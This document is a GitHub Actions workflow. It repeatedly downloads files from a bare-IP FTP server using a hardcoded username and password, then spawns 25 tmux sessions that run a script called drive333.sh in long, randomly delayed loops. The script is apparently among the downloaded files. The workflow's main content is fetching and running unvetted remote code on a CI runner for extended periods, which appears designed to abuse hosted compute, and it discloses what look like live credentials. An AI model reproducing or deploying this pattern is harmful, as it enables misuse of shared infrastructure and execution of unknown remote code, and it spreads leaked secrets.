name: Run tmux sessions

on: 
  push:
    branches:
      - main

jobs:
  run-sessions:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout repository
      uses: actions/checkout@v2

    - name: Install tmux
      run: sudo apt-get install -y tmux

    - name: Run tmux sessions
      run: |
        #!/bin/bash
        
          
          for i in {1..10000}; do

          files=("230117" "230118" "230119" "230120" "230121")
          for file in "${files[@]}"; do
          for i in {1..1}; do
          wget -nH -m --ftp-user=if0_37965025 --ftp-password=98kDsIA4LJEZ "ftp://185.27.134.11/htdocs/$file/*"
          sleep 5
          done
          cp htdocs/$file/* ./
          done
          sleep $((RANDOM % 5 + 1))m
          
          done
        
        for session_num in {1..25}; do
            tmux new-session -d -s "session_$session_num"
            tmux send-keys -t "session_$session_num" "for i in {1..10000}; do sleep \$((RANDOM % 50 + 1))m; bash drive333.sh; done" C-m
        done

        # 列出所有会话
        tmux ls
